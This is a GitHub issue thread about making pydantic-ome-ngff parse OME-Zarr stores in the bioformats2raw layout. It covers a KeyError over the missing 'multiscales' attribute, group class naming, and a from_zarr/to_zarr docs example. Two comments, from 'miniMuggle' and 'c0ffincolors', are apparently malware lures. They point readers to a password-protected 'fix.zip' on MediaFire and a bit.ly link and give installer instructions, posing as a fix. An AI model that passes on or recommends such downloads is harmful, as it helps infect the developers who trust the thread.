### ISSUE TITLE
Support for bioformats2raw transitional layout, etc.

### ISSUE THREAD

**Issue by krokicki** [JaneliaSciComp/pydantic-ome-ngff#36]
When you use bioformats2raw it produces one or more images at the root:
https://ngff.openmicroscopy.org/0.4/#bf2raw

When I try to open one of these zarrs:
```
from pydantic_ome_ngff.v04.multiscale import Group
import zarr
url = "s3://janelia-flylight-imagery/Fly-eFISH/EASI-FISH_NP_SS/NP01_R1_20230906/NP01_R1_1_1_SS00790_AstA_546_CCHa1_647_100x_LOL.zarr"
zgroup = zarr.open(url)
group_model = Group.from_zarr(zgroup)
```

it results in an error:
```
KeyError: 'Failed to find mandatory `multiscales` key in the attributes of the Zarr group at <zarr.storage.FSStore object at 0x7fd55c0f0160>://janelia-flylight-imagery/Fly-eFISH/EASI-FISH_NP_SS/NP01_R1_20230906/NP01_R1_1_1_SS00790_AstA_546_CCHa1_647_100x_LOL.zarr://.'
```

I think that a `Group` should never need a `multiscales` attribute. The OME-Zarr spec does not have high level types, but one way to interpret the spec is that there is a concept of an "[Image](https://ngff.openmicroscopy.org/0.4/#image-layout)" which is a type of group with `multiscales`, so maybe that is a better way to model it. 

In any case, I think it should be possible to parse any valid OME-Zarr and it should just fall back to standard Zarr constructs whenever a concept is missing. For example, even if it doesn't explicitly model `Plate` and `Well` as classes, they could still be expressed as `Group` objects.

**Comment by d-v-b** [comment]
and in case it wasn't clear, `multiscale.Group` is just a subclass of `GroupSpec`, with some additional validation logic the ensures that the group attributes and the array members are consistent

**Comment by krokicki** [comment]
Yes, `MultiscaleGroup` would be better naming. I think what would be really nice is a `Group` (or maybe `OmeZarr`) class that I can use to import the top level of any Zarr I have, and for it to provide access to any multiscale.Group images underneath it.

**Comment by d-v-b** [comment]
> I think what would be really nice is a Group (or maybe OmeZarr) class that I can use to import the top level of any Zarr I have, and for it to provide access to any multiscale.Group images underneath it.

That's a cool idea. I'm not sure there's a simple way to define this is as a generic pydantic model, i.e. to get the behavior you want from `Model.from_zarr` (I will keep thinking about this though), but it would definitely be straightforward to create a function that produces a `GroupSpec` instance where all sub-groups are either vanilla `GroupSpecs` or instances of `multiscale.Group`.

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by d-v-b** [comment]
@krokicki take a look at https://github.com/JaneliaSciComp/pydantic-ome-ngff/pull/37, in particular the docs changes -- I put your specific use case in as an example in the docs. let me know if there's anything I should add to remove there.

**Comment by krokicki** [comment]
Nice! That's most of what I wanted. The only thing left is to make a from_zarr method that creates those from disk representations.

**Comment by d-v-b** [comment]
> The only thing left is to make a from_zarr method that creates those from disk representations.

The [example in the docs](https://janeliascicomp.github.io/pydantic-ome-ngff/#hierarchy-modelling) does a full round-trip to and from disk, albeit just for a hierarchy defined as a Zarr group that contains OME-NGFF groups OR regular zarr groups. Here's a commented, abridged form of the relevant part of the docs example:

```python
# data structure in memory
multi_image_group = GroupOfMultiscales(members=groups)
# memory -> disk
zgroup = multi_image_group.to_zarr(store, path='multi_image_group')
# disk -> memory
GroupOfMultiscales.from_zarr(zgroup)
```
let me know if I should make this more clear in the docs.

So the specific use case that motivated you to open this issue should be addressed in #37, but the general problem of defining a model of a Zarr group that could contain an OME-NGFF group at any level remains open.
